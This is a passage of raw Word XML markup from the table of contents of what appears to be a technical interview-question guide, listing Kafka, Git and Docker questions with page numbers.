              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AACDF8E" w14:textId="381FEB9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9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Kafka’s Consumer Rebalance, and how do you handle it in a large-scale system?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308296 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1093</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35092E04" w14:textId="0FF4981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9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Kafka's consumer rebalance process and strategies for handling it when scaling out consumer groups?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308297 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1094</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C372AB7" w14:textId="5DF5CA8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9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role of Kafka's Producer Acknowledgments?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308298 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1096</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B6E9176" w14:textId="0293960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29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scuss the different acknowledgment levels (acks=0, acks=1, acks=all) in Kafka producers and their impact on message delivery reliability?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308299 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1097</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BCF33AF" w14:textId="6D00782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0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significance of "log.retention.ms" and "log.segment.bytes" configurations in Kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308300 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1097</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66FE95EA" w14:textId="3A23ABC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0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the role of these configurations in managing message retention and log segment sizes, and how they influence performance and disk space?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308301 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1098</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FCA2DF0" w14:textId="3502F0B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0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do you ensure Kafka data consistency across distributed clusters?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308302 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1099</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A513AAA" w14:textId="484D56A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0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scuss strategies for ensuring data consistency and replication across Kafka clusters, such as cross-data-center replication and the use of Kafka MirrorMaker?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308303 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1100</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39444381" w14:textId="00726B4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0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If we have more consumer groups than partitions and how will it manage?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308304 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1102</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ADE8B1A" w14:textId="2E5D182D" w:rsidR="00012799" w:rsidRDefault="00012799">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308305" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GitHub</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308305 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1104</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="168B12C1" w14:textId="600B7BB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0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Version control i.e. Git?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308306 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1104</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="705B3354" w14:textId="1F12ECD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0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push and commit code in git using commands?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308307 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1104</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75CD06B6" w14:textId="480C60D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0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rebase and merge?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308308 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1105</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55877538" w14:textId="6214777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0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a Git commands?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308309 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1107</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48A8BDFC" w14:textId="0D7A2ED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1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Git command to create a new branch from an existing branch?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308310 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1109</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C8D41D2" w14:textId="3DFBBCAB" w:rsidR="00012799" w:rsidRDefault="00012799">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308311" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Docker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308311 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1110</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2222BD87" w14:textId="738C22F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1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Docker?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308312 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1110</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29CDAC47" w14:textId="63A3B2B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1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use cases of Docker?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308313 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1111</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5256D72A" w14:textId="7180BAE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1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You have 2 containers 1 and 2, can they communicate with each other?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308314 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1112</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68894903" w14:textId="6EC4CAB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1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If both are with different hosts then whether they will be able to communicate with each other or not?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308315 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1113</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75C2E15C" w14:textId="6D5E058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1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host in this case?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308316 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1114</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="504C8E7E" w14:textId="69DAAE4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1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Imagine you have one volume and you want to share it with multiple containers? How will you do it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308317 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1115</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24034C38" w14:textId="5A374E5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1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ere does an object get stored when created inside a docker container?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308318 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1115</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D8FCF05" w14:textId="49AF6F2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1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process of Docker?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308319 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1115</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0105C205" w14:textId="17BBE91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2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is Docker helpful?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308320 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
